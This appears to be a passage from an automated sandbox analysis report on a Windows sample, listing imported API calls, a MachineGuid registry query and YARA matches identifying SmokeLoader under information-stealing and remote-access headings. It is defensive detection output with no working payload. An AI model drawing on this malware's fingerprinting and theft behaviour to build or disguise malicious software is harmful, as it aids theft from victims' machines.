Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.692484311.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.711003387.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA, 0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate, 0_2_00434C50
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 0_2_00431810
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_0042D890
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea, 0_2_00434CA0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,InterlockedDecrement, 0_2_004245C0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry, 0_2_004315D0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,EnumSystemLocalesA, 0_2_00431580
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_00430E60
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement, 0_2_0042EB40
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_00431360
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,__invoke_watson_if_error,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0042C370
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW, 0_2_00431710
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement, 0_2_0042EF20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 0_2_00430B20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage, 0_2_00430F20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage, 0_2_004313E0
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA, 0_2_0041C7DF
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA, 0_2_0041CA09

Stealing of Sensitive Information:

Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY